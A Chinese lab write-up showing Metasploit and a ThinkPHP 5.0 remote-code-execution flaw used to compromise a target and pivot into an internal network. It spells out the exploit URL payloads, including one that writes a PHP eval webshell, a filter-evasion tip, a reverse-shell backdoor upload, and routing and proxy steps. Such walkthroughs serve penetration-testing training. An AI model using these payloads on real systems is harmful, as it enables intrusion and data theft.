利用Metasploit 打入ThinkPHP内网...

本文作者：dch（Ms08067实验室 SRSP TEAM小组成员）

一、利用Metasploit进行攻击的流程图

图1 Metasploit渗透流程

二、Metasploit渗透攻击

（1）通过msfconsole命令启动Metasploit在这个过程中，系统会主动加载数据库，如图2所示：

图2 启动Metasploit

（2）使用辅助模块进行端口扫描，如下图3所示：

图3 进行扫描

（3）寻找合适的漏洞利用模块并使用，如下图4所示：

图4 加载模块

（4）查看并修改参数，如下图 5所示：

图5 修改参数

（5）利用漏洞 Exploi，如下图6所示：

图6 漏洞利用

三、实施攻击

1、靶机 、攻击机

（1）目标地址 192.168. 222 130

（2）攻击地址 192.168. 238.129

2、用nmap进行端口扫描（通过端口扫描找到其开放的服务，再根据相关的服务查找与之相对应的漏洞进行利用），如图7所示

图7 端口扫描

通过扫描可以看到Target1发现开放了21（ftp）、22（ssh）、80（http ）、111（RPC）、888 （http）、3306（Mysql）、8888（http）这些端口服务，且是一个Linux 的操作系统。

3、进入web界面

图8 web界面

打开后发现它是ThinkPHP框架，版本是V5.0，这时候想到它存在一个

RCE（远程命令执行）漏洞，先用POC（利用程序）测试一下

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 ，结果如图9所示

图9 进行漏洞测试

4、成功出现了PHPinfo界面，说明该版本是存在漏洞的。用POC写入一句话，写入一句话到cmd.php：

http://192.168.222.130/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" > cmd.php

5、上传后，通过蚁剑进行连接，发现并不能成功连接。发现是$_POST被过滤了，这里可以利用编码（如Base64、URL）后再次上传。

6、用蚁剑进行连接，成功连接。此时已经获取到该主机的shell，可以查看系

统的信息等。如下图10、11所示：

图10 成功获得shell

图11 查看系统信息

7、根据攻击机的IP地址及目标靶机的系统类型生成对应的后门文件 ，如图

12、13所示：

图12 查看攻击机IP

图13 制作后门

8、在kali中配置运行监听模块，如下图14所示：

图14 msf设置监听

9、通过蚁剑将后门文件shell.elf上传到靶机中，并赋予777权限以执行，如

图15、16所示：

图15 上传shell.elf后门文件

图16 赋予777权限执行

10、获得 meterpreter，如图17所示

图17 获得meterpreter

11、查看可用网段，如图18所示

图18 查看可用网段

12、发现两个网段：一个是192.168.2.0/24，另一个是192.168.222.0/24，通过meterpreter对192.168.222.0/24添加第二层的路由，如下图19所示

图19 添加第二层路由

13、添加成功后进行内网扫描，查看内网中存活的主机，如图20所示

图20 查看存活主机

14、发现第二层靶机192.168.222.128，如下图21所示

图21 出现第二层网址

15、在MSF中设置代理

图22 设置代理

图 23

通过设置代理，进行下一步的内网渗透